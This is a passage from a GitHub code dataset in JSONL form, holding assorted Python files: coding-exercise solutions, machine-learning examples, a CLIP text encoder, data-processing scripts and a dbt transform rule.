', '', tmptext)\n tmptext = re.sub('
', '', tmptext)\n # tmptext = re.sub('width=\"235px\"', '', tmptext)\n # tmptext = re.sub('width=\"237px\"', '', tmptext)\n # tmptext = re.sub('width=\"552px\"', '', tmptext)\n return tmptext\n","repo_name":"camico/AmarokReader","sub_path":"conTEXT/filetypes/Allmusic.py","file_name":"Allmusic.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"fa","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"28790024420","text":"'''\n Date : 11/11/2020\n Day : Wednessday\n Author : Md. Aminul Islam\n Topic : Problem Solving\n Problem : Sum and Prod\n Problem link : https://www.hackerrank.com/challenges/np-sum-and-prod/problem\n''' \n\nimport numpy as np\n\nn, m = map(int, input().split())\n\narr = np.array([input().split() for _ in range(n)], int)\n\narr_sum = np.sum(arr, axis = 0)\narr_prod = np.prod(arr_sum)\n\nprint(arr_prod)","repo_name":"aminul788/NSL-RAShip-Programm","sub_path":"python-basic/Problem-Solving/Sum_and_Prod.py","file_name":"Sum_and_Prod.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"9262663437","text":"import os\nimport numpy as np\nimport pandas as pd\nimport constant\n\nRANDOM_SEED = [12346, 12347, 12348]\nASR = constant.ASR\nTTS = constant.TTS\nDATASET = constant.DATASET\n\nimport sys, getopt\nimport utils\nimport constant\n\ndef printHelp() :\n print('calculate_averaged_result.py -a ')\n print(\"or\")\n print('calculate_averaged_result.py --approach ')\n\ndef main(argv):\n approach = \"\"\n try:\n opts, args = getopt.getopt(argv,\"ha:\",[\"approach=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-a\", \"--approach\"):\n approach = arg\n \n if approach != \"\" :\n calculateAveragedResult(approach)\n else :\n print(\"Please specify the output file location\")\n\ndef calculateAveragedResult(approach) :\n\n df = {}\n avg = {}\n\n for tts in TTS:\n\n a = {}\n avg[tts] = {}\n\n for sr in ASR:\n\n b = {}\n\n avg[tts][sr] = {}\n\n for random_seed in RANDOM_SEED:\n\n fpath = \"result/%s/%s-%d/%s/%s/statistic.csv\" % (approach,\n DATASET, random_seed, tts, sr)\n b[random_seed] = pd.read_csv(fpath)\n\n a[sr] = b\n\n df[tts] = a\n\n avg = {}\n for tts in TTS:\n t = {}\n for sr in ASR:\n s = {}\n i = RANDOM_SEED[0]\n first = i\n temp = df[tts][sr][i]\n for i in RANDOM_SEED:\n if i != first:\n temp = temp.add(df[tts][sr][i], fill_value=0)\n t[sr] = temp/len(RANDOM_SEED)\n t[sr] = t[sr].drop(columns=[\"stc\", \"utc\"])\n avg[tts] = t\n\n for tts in TTS:\n for sr in ASR:\n folder = \"result/%s/%s-averaged/%s/%s/\" % (approach, DATASET,tts, sr)\n if not os.path.exists(folder):\n os.makedirs(folder)\n\n fpath = folder + \"statistic.csv\"\n avg[tts][sr].to_csv(fpath, index=False, float_format='%.2f')\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"soarsmu/CrossASR","sub_path":"calculate_averaged_result.py","file_name":"calculate_averaged_result.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"6204776345","text":"# https://leetcode.com/problems/remove-duplicates-from-sorted-array/\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n insert_at = 1\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n nums[insert_at] = nums[i]\n insert_at += 1\n\n return insert_at\n","repo_name":"priyakdey/leetcode-solutions","sub_path":"arrays/26.py","file_name":"26.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"33404068595","text":"# Добавить в Employee атрибут класса department = None\n# Унаследовать от Employee класс TechnicalStaff в котором реализовать метод класса change_department, позволяющий\n# менять департамент\n# Добавить в свойство info данные о департаменте\n\n# Добавить в TechnicalStaff статичный метод get_info(employee), получающий данные от работника и если работник из того же\n# департамента - выдавать приветствие.\n\nfrom hw_08_01 import Employee\n\n\nclass TechnicalStaff(Employee):\n department = 'Practical medicine'\n\n @staticmethod\n def get_info(employee):\n if TechnicalStaff.department == employee.department:\n return 'hi'\n return 'You are from different department'\n\n\nfirst_employee = Employee('Yulia', 'Sukach', 24, 'someone')\nassert first_employee.info['fullname'] == 'Yulia Sukach'\nassert first_employee.info['age'] == 24\n\n\nfirst_employee.change_department('Preventive medicine')\n\n\nsecond_employee = TechnicalStaff('Alesia', 'Ivanova', 25, 'dentist')\nassert second_employee.info['fullname'] == 'Alesia Ivanova'\nassert second_employee.info['age'] == 25\n\nassert TechnicalStaff.get_info(first_employee) == 'You are from different department'\n\nsecond_employee.change_department('Preventive medicine')\n\nassert TechnicalStaff.get_info(first_employee) == 'hi'\n\n\n\n\n","repo_name":"YuliaSukach/Python-HW","sub_path":"less_08/hw_08_02_03.py","file_name":"hw_08_02_03.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"5333006684","text":"def ispangram(str): \r\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\r\n for char in alphabet: \r\n if char not in str.lower(): \r\n return False\r\n \r\n return True\r\n\r\nstr = input(\"enter a sentence :\\n \")\r\nif ispangram(str):\r\n print('contains all alphabets')\r\nelse:\r\n print('does not contain all alphabets')\r\n","repo_name":"aryanjalla/advanceProgrammingPractices","sub_path":"Week 2/SET 14/ques1.py","file_name":"ques1.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"31251027477","text":"\r\nprint(\"hrllo world\")\r\n\r\nfor i,count in enumerate(range(500)):\r\n print(i, count,end = \"\\n============\\n\", sep = \"-\")\r\n \r\n# ================================================================\r\n \r\ntest = print(int((input(\"enter\")))*2)\r\n\r\n# ================================================================\r\n# positive even, positive odd, negative even, negative odd, zero\r\n\r\nx = float(input(\"enter no: \"))\r\n\r\nprint()\r\n\r\nif(x>0):\r\n if(x % 2 ==0):\r\n print(x,\"is positive even\")\r\n else:\r\n print(x,\"is positive odd\")\r\nelif(x<0):\r\n if(x % 2 ==0):\r\n print(x,\"is negative even\")\r\n else:\r\n print(x,\"is negative odd\")\r\nelse:\r\n print(x,\"is zero\")\r\nprint()\r\n\r\n\r\n\r\nif(x > 0) and (x % 2 == 0):\r\n print(x,\"is positive even\")\r\n\r\nelif(x > 0) and (x % 2 == 1):\r\n print(x,\"is positive odd\")\r\n\r\nelif(x < 0) and (x % 2 == 0):\r\n print(x,\"is negative even\")\r\n\r\nelif(x < 0) and (x % 2 == 1):\r\n print(x,\"is negative odd\")\r\n\r\nelse:\r\n print(x,\"is zero\")\r\n# ================================================================\r\n\r\n\r\nprint(\"camparision program\")\r\n\r\na = float(input(\"enter a: \"))\r\nb = float(input(\"enter b: \"))\r\n\r\nif(a > b):\r\n print(a,\"is greater than\",b)\r\nelif(a < b):\r\n print(b,\"is greater than\",b)\r\nelse:\r\n print(f\"{a} amd {b} are the same\")\r\n\r\n\r\na = int(input(\"enter your current salary: \"))\r\nk = int(input(\"enter increment per month: \"))\r\ny = int(input(\"years: \"))\r\n# your salary will be b after 5 yrs\r\n\r\nt = y * 12 # t is duration in months\r\nb = a + k*t\r\n\r\nprint(f\"your salary will be {b} rs after {y} years\")\r\n\r\n# sum of n natural numbers\r\n\r\nn = int(input(\"till which number you want sum ? \"))\r\n\r\n# using for loop\r\nsum=0\r\nfor i in range(1,n+1):\r\n sum += i\r\n\r\n# using formula\r\nsum = n*(n+1)/2\r\n\r\nprint(sum)\r\n\r\n# table of n\r\n\r\nn = int(input(\"you want table of ? \"))\r\n\r\nfor i in range(1,11):\r\n print(i*n,end = \" \")\r\n \r\nr = range(6)\r\nprint(r)\r\nprint(type(r))\r\nprint(list(r))\r\n\r\nprint(list(range(20,10,-2)))\r\nprint(list(range(20,10,2)))\r\n\r\n# smallest divisor of given number n \r\n\r\nn = int(input(\"enter number: \"))\r\n\r\nfor i in range(2,n+1):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n\r\n\r\ni = 2\r\nwhile (i<=n):\r\n if(n % i == 0):\r\n print(f\"{i} is the smallest divisor of {n}\")\r\n break\r\n i += 1\r\n\r\n\r\n# print numbers in the given list which are not divisible by 5\r\n\r\n\r\nl = [10, 16, 17, 18, 20, 22, 35]\r\n\r\n\r\nfor x in l:\r\n if( x % 5 == 0):\r\n continue\r\n print(x,end = \" \")\r\n\r\n\r\n# print tables of numbers from 1 to n\r\n\r\nn = int(input(\"enter number : \"))\r\n\r\nfor i in range(1,n+1):\r\n print(i,\": \", end = \" \")\r\n for j in range(1,11):\r\n print(i*j, end = \" \")\r\n print()\r\n\r\ndef f(): pass\r\nprint(type(f()))\r\n\r\n\r\nn = int(input(\"enter number : \")) \r\n\r\nfor i in range(n):\r\n if i == 0:\r\n print(\"*\")\r\n elif i == n-1:\r\n print(\"*\"*n)\r\n else:\r\n print(\"*\",\" \"*(i-2),\"*\")\r\n \r\ndef fib(n):\r\n if (n == 1) or (n == 2):\r\n return 1\r\n res = fib(n-1) + fib(n-2)\r\n return res\r\n\r\nprint(fib(6))\r\n\r\na = int(input(\"enter number a : \")) \r\nb = int(input(\"enter number b : \")) \r\n\r\ndef gcd(a, b):\r\n \r\n # code here to calculate and return gcd of a and b\r\n counter = a if (a geeks for geeks\r\n pat -> geeks\r\n o/p -> 0 10\r\n'''\r\n\r\ntext = \"geeks for geeksgeeksgeefs geeksian \"\r\npat = \"geeks\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + len(pat) \r\n \r\n \r\n''' i/p : text -> AAAAA\r\n pat -> AAA\r\n o/p -> 0 1 2\r\n'''\r\n\r\n#method01\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\ni = 0\r\n\r\nwhile True:\r\n pos = text.find(pat,i)\r\n if pos == -1:\r\n break\r\n print(pos, end = \" \")\r\n i = pos + 1\r\n\r\n\r\n#method02\r\ntext = \"AAAAA\"\r\npat = \"AAA\"\r\n\r\npos = text.find(pat)\r\nwhile pos >= 0:\r\n print(pos, end = \" \")\r\n pos = text.find(pat,pos+1)\r\n \r\n \r\ndef reverseString(s):\r\n #Write your code below to reverse s and return it\r\n s_list = list(s)\r\n reverse_string = []\r\n for i in range(len(s_list)):\r\n j = len(s_list)-(i+1)\r\n reverse_string.append(s_list[j])\r\n return \"\".join(reverse_string)\r\n\r\ndef reverseString(s):\r\n return s[::-1]\r\n\r\nprint(reverseString(\"hello\"))\r\n\r\n\r\n\r\n","repo_name":"arihantvyavhare/PythonStuff","sub_path":"py_basics01.py","file_name":"py_basics01.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20736963509","text":"import pickle\nimport os\n\nscores = list()\n\ndef input_scores():\n score=int(input())\n if score > 0:\n scores.append(score)\n return score \n\ndef get_average(scores):\n return sum(scores)/len(scores)\n\ndef show_scores(avg):\n print(\"개인점수:\",end=\" \")\n for i in scores:\n print(f\"{i}\",end=\" \")\n print()\n print(\"평균: \",avg)\n\ndef search(scores,score):\n count =0\n for i in scores:\n find=0\n count +=1\n if i == score:\n print(f\"{score}점은 {count}번 학생의 점수입니다.\")\n find = score\n break\n if find == 0:\n print(f\"{score}점을 받은 학생은 없습니다.\")\n\nfilepath = 'C:/Users/ahn/Desktop/mlData/'\nfilename = 'score.bin'\ndef save(scores):\n with open(f'{filepath}{filename}','wb') as file:\n pickle.dump(scores,file)\n\ndef load():\n with open(filename,'rb') as file:\n scores=pickle.load(file)\n return scores\n\ni=1\n\n \n\nif not(os.path.exists(filename)):\n while True: \n print(f\"#{i}?\",end=\" \")\n n = input_scores()\n i+=1\n if n<0:\n break\n save(scores)\nelse:\n result = load()\n avg = get_average(result)\n print('[파일 읽기]\\n')\n\n print('[점수 출력]')\n show_scores(avg)\n","repo_name":"ayz1070/python","sub_path":"python programming/hw10.py","file_name":"hw10.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37912505746","text":"from queue import Queue\n\nq = Queue()\nn = int(input())\nq.put(\"1\")\n\nwhile(n):\n\tn -= 1\n\n\ts1 = q.get()\n\n\tprint (s1)\n\n\ts2 = s1\n\n\tq.put(s1+\"0\")\n\n\tq.put(s2+\"1\")\n\n","repo_name":"pranavdave893/Leetcode","sub_path":"binary_with_queue.py","file_name":"binary_with_queue.py","file_ext":"py","file_size_in_byte":155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"71819118509","text":"import pygame\nimport sys\nimport random\nfrom Block import *\n\nVERTICAL = 10\nHORIZONTAL = 15\nTAILLE_CASE = 40\n\nFENETRE = pygame.display.set_mode(size=(VERTICAL * TAILLE_CASE, HORIZONTAL * TAILLE_CASE))\nFPS = pygame.time.Clock()\n \n \nclass Cherry:\n def __init__(self):\n x = random.randint(0,VERTICAL -1)\n y = random.randint(0,HORIZONTAL -1)\n self.block = Block(x, y)\n \n def draw_Cherry(self):\n rect = pygame.Rect(self.block.x * TAILLE_CASE,self.block.y * TAILLE_CASE, TAILLE_CASE, TAILLE_CASE)\n pygame.draw.rect(FENETRE,(255, 56, 24), rect)","repo_name":"Evolinki/SnakePygame","sub_path":"Cherry.py","file_name":"Cherry.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"29974759666","text":"import os\n\nimport keras\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\nprint(X_train.shape)\n# X_train = X_train.reshape(-1, 28 * 28) # without normalization\n# X_test = X_test.reshape(-1, 28 * 28)\n\nX_train = X_train.reshape(-1,28*28)/255.0 # Normalization increases accuracy\nX_test = X_test.reshape(-1,28*28)/255.0\nprint(X_train.shape)\n\n# Sequential API\n# model = keras.Sequential([ # passing layers as list to model.\n# keras.Input(shape=(28*28)),\n# layers.Dense(512, activation='relu'),\n# layers.Dense(256, activation='relu'),\n# layers.Dense(10)\n# ])\n# print(model.summary()) // if we include input layer.\n\n# Sequential API - 2\nmodel = keras.Sequential()\nmodel.add(layers.Input(shape=(28*28)))\nmodel.add(layers.Dense(512, activation='relu'))\nmodel.add(layers.Dense(256, activation='relu',name='my_layer'))\nmodel.add(layers.Dense(10))\n\nmodel = keras.Model(inputs = model.inputs,\n # outputs = [model.layers[-1].output]\n #outputs = [model.get_layer('my_layer').output] # We can access layers by their name.\n outputs = [layer.output for layer in model.layers])\n\nfeature = model.predict(X_train)\nfor features in feature:\n print(features.shape)\n# print('feature shape :',feature.shape)\n\n\n# Functional API\n# input = layers.Input(shape=(28 * 28))\n# x = layers.Dense(512, activation='relu',name='first_layer')(input)\n# x = layers.Dense(256, activation='relu',name='second_layer')(x)\n# output = layers.Dense(10, activation='softmax')(x)\n# model = keras.Model(inputs=input, outputs=output)\n\n# import sys\n# sys.exit()\nmodel.compile(\n loss=keras.losses.SparseCategoricalCrossentropy(from_logits=True), # Only set it to True if you are not using softmax in model.\n optimizer=keras.optimizers.legacy.Adam(learning_rate=0.001),\n metrics=['accuracy']\n)\n\nmodel.fit(X_train, y_train, epochs=5, verbose=2)\nprint(model.summary())\nmodel.evaluate(X_test, y_test, verbose=2)\n","repo_name":"Asrar-Ahammad/tensorflowPractice","sub_path":"02_neuralNetwork.py","file_name":"02_neuralNetwork.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"36893205637","text":"import time\nfrom utils import readInput\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadInput():\n lines = readInput(\"prova.txt\")\n lines = readInput(\"input_8.txt\")\n grid = np.zeros(shape=(len(lines[0]), len(lines)))\n\n for y in range(len(lines)):\n for x in range(len(lines[0])):\n grid[x, y] = int(lines[y][x])\n return grid\n\ndef draw_forest(grid):\n plt.imshow(grid)\n plt.show()\n\n\ndef part1(grid):\n xmax, ymax = grid.shape\n visible = np.zeros(shape=(xmax, ymax))\n\n for y in range(ymax):\n height = grid[0, y]\n visible[0, y] = 1\n for x in range(1, xmax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[-1, y]\n visible[-1, y] = 1\n for x in range(xmax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n for x in range(xmax):\n height = grid[x, 0]\n visible[x, 0] = 1\n for y in range(1, ymax):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n height = grid[x, -1]\n visible[x, -1] = 1\n for y in range(ymax-1, 0, -1):\n if grid[x, y] > height:\n visible[x, y] = 1\n height = grid[x, y] \n\n print (\"🎄 Part 1: {}\".format(visible.sum()))\n\ndef part2(grid):\n xmax, ymax = grid.shape\n dirs = [(0, 1), (1, 0), (-1, 0), (0, -1)]\n scenic_score = 0\n for x in range(xmax):\n for y in range(ymax):\n score = []\n for d in dirs:\n steps = 1\n visible = 0\n while True:\n new_x, new_y = x + steps*d[0], y + steps*d[1]\n if 0 <= new_x < xmax and 0 <= new_y < ymax:\n if grid[new_x, new_y] < grid[x, y]:\n visible += 1\n else:\n visible += 1\n break\n else:\n break\n steps += 1\n score.append(visible)\n scenic_score = max(np.prod(score), scenic_score)\n\n print (\"🎄🎅 Part 2: {}\".format(scenic_score))\n\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\nprint(\"⛄ Day 8 ⛄\")\nprint(\"⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄⛄\")\n\ngrid = loadInput()\ndraw_forest(grid)\nquit()\nt0 = time.time()\npart1(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n\nt0 = time.time()\npart2(grid)\nprint (\"Time: {:.5f}\".format(time.time()-t0))\n","repo_name":"matteosan1/AoC","sub_path":"2022/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"40017156529","text":"import io\nimport os\n\nimport pandas as pd\nfrom dotenv import load_dotenv\nfrom minio import Minio\nfrom pysus.online_data.CNES import download\nfrom pysus.online_data.sinasc import download as download_sinasc\n\nload_dotenv()\n\n\ndef csv_to_parquet():\n landing_bucket_name = \"landing\"\n curated_bucket_name = \"curated\"\n minio_endpoint = \"localhost:9100\"\n minio_access_key = os.getenv(\"minio_access_key\")\n minio_secret_key = os.getenv(\"minio_secret_key\")\n object_name_from = \"events-sample.csv\"\n object_name_to = \"events-sample.parquet\"\n\n client = Minio(\n minio_endpoint,\n access_key=minio_access_key,\n secret_key=minio_secret_key,\n secure=False\n )\n\n found = client.bucket_exists(landing_bucket_name)\n if not found:\n client.make_bucket(landing_bucket_name)\n else:\n print(f'Bucket {landing_bucket_name} já existe!')\n\n file = client.get_object(landing_bucket_name, object_name=object_name_from)\n\n df = pd.read_csv(file)\n bytes_data = df.to_parquet()\n buffer = io.BytesIO(bytes_data)\n\n print(buffer)\n client.put_object(\n curated_bucket_name,\n object_name_to,\n buffer,\n len(bytes_data),\n 'application/parquet'\n )\n\n\ndef download_cnes():\n df = download_sinasc('SE', 2015)\n print(\"OK: \" + df.head())\n df = download(group=\"ST\", state=\"DF\", year=2021, month=1, cache=True)\n print(\"OOOOK\")\n print(\"GO\" + df.head())\n\n\ndef cnes_download():\n print(\"!\")\n\n\n\nif __name__ == \"__main__\":\n download_cnes()\n","repo_name":"GleytonLima/datasus-elt","sub_path":"src/testes_local.py","file_name":"testes_local.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"41259422736","text":"class Solution:\n def searchInsert(self, nums: 'List[int]', target: 'int') -> 'int':\n lens = len(nums)\n l, r = 0, lens-1\n while l <= r:\n mid = int((l+r)/2)\n if nums[mid] < target:\n l = mid+1\n else:\n r = mid-1\n # if l-1>=0 and nums[l] \n return l\n\nif __name__ == \"__main__\":\n print(\n Solution().searchInsert(\n [1, 2, 3, 4, 5], 2.5\n )\n )","repo_name":"kimroniny/ACM","sub_path":"LeetCode/0035/35.py","file_name":"35.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"38619335597","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import Model\nfrom keras.layers import Permute, Dense, LayerNormalization, Embedding\nimport tensorflow_addons as tfa\nfrom .layers import quick_gelu, Layer\n\nclass CLIPAttention(Layer):\n def __init__(self):\n super().__init__()\n self.emb_dim = 768\n self.num_heads = 12\n self.head_dim = self.emb_dim // self.num_heads\n self.scale = self.head_dim ** -0.5\n self.q_proj = Dense(self.emb_dim)\n self.k_proj = Dense(self.emb_dim)\n self.v_proj = Dense(self.emb_dim)\n self.out_proj = Dense(self.emb_dim)\n\n def _shape(self, tensor, seq_len: int, batch_size: int):\n a = tf.reshape(tensor, (batch_size, seq_len, self.num_heads, self.head_dim))\n\n return Permute((2, 1, 3))(a) # bs, n_head, seq_len, head_dim\n\n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n batch_size, tgt_len, emb_dim = hidden_states.shape\n query_states = self.q_proj(hidden_states) * self.scale\n key_states = self._shape(self.k_proj(hidden_states), tgt_len, -1)\n value_states = self._shape(self.v_proj(hidden_states), tgt_len, -1)\n\n proj_shape = (-1, tgt_len, self.head_dim)\n query_states = self._shape(query_states, tgt_len, -1)\n query_states = tf.reshape(query_states, proj_shape)\n key_states = tf.reshape(key_states, proj_shape)\n\n src_len = tgt_len\n value_states = tf.reshape(value_states, proj_shape)\n attn_weights = query_states @ Permute((2, 1))(key_states)\n attn_weights = tf.reshape(attn_weights, (-1, self.num_heads, tgt_len, src_len))\n attn_weights = attn_weights + casual_attention_mask\n attn_weights = tf.reshape(attn_weights, (-1, tgt_len, src_len))\n\n attn_weights = tf.nn.softmax(attn_weights)\n attn_output = attn_weights @ value_states\n attn_output = tf.reshape(attn_output, (-1, self.num_heads, tgt_len, self.head_dim))\n attn_output = Permute((2, 1, 3))(attn_output)\n attn_output = tf.reshape(attn_output, (-1, tgt_len, emb_dim))\n\n return self.out_proj(attn_output)\n \n\nclass CLIPEncoderLayer(Layer):\n def __init__(self):\n super().__init__()\n self.layer_norm1 = LayerNormalization(epsilon=1e-5)\n self.self_attn = CLIPAttention()\n self.layer_norm2 = LayerNormalization(epsilon=1e-5)\n self.fc1 = Dense(3072)\n self.fc2 = Dense(768)\n \n def call(self, inputs):\n hidden_states, casual_attention_mask = inputs\n residual = hidden_states\n \n hidden_states = self.layer_norm1(hidden_states)\n hidden_states = self.self_attn([hidden_states, casual_attention_mask])\n hidden_states = residual + hidden_states\n residual = hidden_states\n hidden_states = self.layer_norm2(hidden_states)\n hidden_states = self.fc1(hidden_states)\n hidden_states = quick_gelu(hidden_states)\n hidden_states = self.fc2(hidden_states)\n\n return residual + hidden_states\n\nclass CLIPEncoder(Layer):\n def __init__(self):\n super().__init__()\n self.layers = [CLIPEncoderLayer() for _ in range(12)]\n\n def call(self, x):\n [hidden_states, casual_attention_mask] = x\n for layer in self.layers:\n hidden_states = layer([hidden_states, casual_attention_mask])\n return hidden_states\n\n\nclass CLIPTextEmbedding(Layer):\n def __init__(self, n_words=77):\n super().__init__()\n # Token and Position Embedding Layer\n self.token_embedding = Embedding(\n 49408, 768, name=\"token_embedding\"\n )\n self.position_embedding = Embedding(\n n_words, 768, name=\"position_embedding\"\n )\n\n def call(self, x):\n input_ids, pos_ids = x\n word_embeddings = self.token_embedding(input_ids)\n pos_embeddings = self.position_embedding(pos_ids)\n\n return word_embeddings + pos_embeddings\n\nclass CLIPTextTransformer(Model):\n def __init__(self, n_words=77):\n super().__init__()\n self.embeddings = CLIPTextEmbedding(n_words=n_words)\n self.encoder = CLIPEncoder()\n self.final_layer_norm = LayerNormalization(epsilon=1e-5)\n self.casual_attention_mask = tf.constant(\n np.triu(np.ones((1, 1, 77, 77), dtype='float32') * -np.inf, k=1)\n )\n\n def call(self, inputs):\n input_ids, pos_ids = inputs\n x = self.embeddings([input_ids, pos_ids])\n x = self.encoder([x, self.casual_attention_mask])\n\n return self.final_layer_norm(x)\n ","repo_name":"Raghvender1205/AI_From_Scratch","sub_path":"DiffusionModels/StableDiffusion/stablediffusion/clip_encoder.py","file_name":"clip_encoder.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"38"}
+{"seq_id":"7466316408","text":"# importing the requests library\nimport requests\nimport json\nimport logging\nimport datetime\n\nlogging.basicConfig(level=logging.DEBUG,\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',\n )\n\nclass Request:\n # defining the api-endpoint\n API_ENDPOINT = \"http://192.168.0.11:3000/listnotes\"\n\n # your API key here\n API_KEY = \"XXXXXXXXXXXXXXXXX\"\n\n acc = {'aX': [],\n 'aY': [],\n 'aZ': []}\n\n mag = {'mX': [],\n 'mY': [],\n 'mZ': []}\n\n timestamp = '1000111111'\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n data = {'title': 'msg from node number correct',\n 'acc': acc,\n 'mag': mag,\n 'timestamp': timestamp}\n\n\n def sendPost(self,data):\n listValues = data['values']\n actualTime = str(round(datetime.datetime.now().timestamp(),2))\n dataPackage = {'title': 'meranickoRanicko', 'timestamp': actualTime, 'meranie': []}\n listValues = [x.replace(\"\\r\\n\",\"\") for x in listValues]\n for i in range(len(listValues)):\n aX, aY, aZ, mX, mY, mZ, actualTime = listValues[i].split(\",\")\n acc = {'aX': aX,\n 'aY': aY,\n 'aZ': aZ}\n\n mag = {'mX': int(mX),\n 'mY': int(mY),\n 'mZ': int(mZ)}\n\n # 'api_paste_format': 'python',\n # data to be sent to api\n dataDictionary = {'acc': acc, 'mag': mag, 'timestamp': actualTime}\n dataPackage['meranie'].append(dataDictionary)\n\n # sending post request and saving response as response object\n # r = requests.post(url=Request.API_ENDPOINT, json=Request.data)\n # logging.debug(\"Sending Request with: %i elements\" % len(dataDictionary))\n\n r = requests.post(url=Request.API_ENDPOINT, json=dataPackage)\n\n # extracting response text\n pastebin_url = r.text\n # logging.debug(\"The pastebin URL is:%s\" % pastebin_url)\n","repo_name":"UserTomas/device_monitoring","sub_path":"Raspberry/APIrequests.py","file_name":"APIrequests.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"41801543812","text":"from typing import Set\n\nfrom typing_extensions import override\n\nfrom dbt_semantic_interfaces.enum_extension import assert_values_exhausted\nfrom dbt_semantic_interfaces.errors import ModelTransformError\nfrom dbt_semantic_interfaces.implementations.metric import PydanticMetricInputMeasure\nfrom dbt_semantic_interfaces.implementations.semantic_manifest import (\n PydanticSemanticManifest,\n)\nfrom dbt_semantic_interfaces.protocols import ProtocolHint\nfrom dbt_semantic_interfaces.transformations.transform_rule import (\n SemanticManifestTransformRule,\n)\nfrom dbt_semantic_interfaces.type_enums import MetricType\n\n\nclass AddInputMetricMeasuresRule(ProtocolHint[SemanticManifestTransformRule[PydanticSemanticManifest]]):\n \"\"\"Add all measures corresponding to the input metrics of the derived metric.\"\"\"\n\n @override\n def _implements_protocol(self) -> SemanticManifestTransformRule[PydanticSemanticManifest]: # noqa: D\n return self\n\n @staticmethod\n def _get_measures_for_metric(\n semantic_manifest: PydanticSemanticManifest, metric_name: str\n ) -> Set[PydanticMetricInputMeasure]:\n \"\"\"Returns a unique set of input measures for a given metric.\"\"\"\n measures: Set = set()\n matched_metric = next(\n iter((metric for metric in semantic_manifest.metrics if metric.name == metric_name)), None\n )\n if matched_metric:\n if matched_metric.type is MetricType.SIMPLE or matched_metric.type is MetricType.CUMULATIVE:\n assert (\n matched_metric.type_params.measure is not None\n ), f\"{matched_metric} should have a measure defined, but it does not.\"\n measures.add(matched_metric.type_params.measure)\n elif matched_metric.type is MetricType.DERIVED or matched_metric.type is MetricType.RATIO:\n for input_metric in matched_metric.input_metrics:\n measures.update(\n AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, input_metric.name)\n )\n else:\n assert_values_exhausted(matched_metric.type)\n else:\n raise ModelTransformError(f\"Metric '{metric_name}' is not configured as a metric in the model.\")\n return measures\n\n @staticmethod\n def transform_model(semantic_manifest: PydanticSemanticManifest) -> PydanticSemanticManifest: # noqa: D\n for metric in semantic_manifest.metrics:\n measures = AddInputMetricMeasuresRule._get_measures_for_metric(semantic_manifest, metric.name)\n assert len(metric.type_params.input_measures) == 0, f\"{metric} should not have measures predefined\"\n metric.type_params.input_measures = list(measures)\n\n return 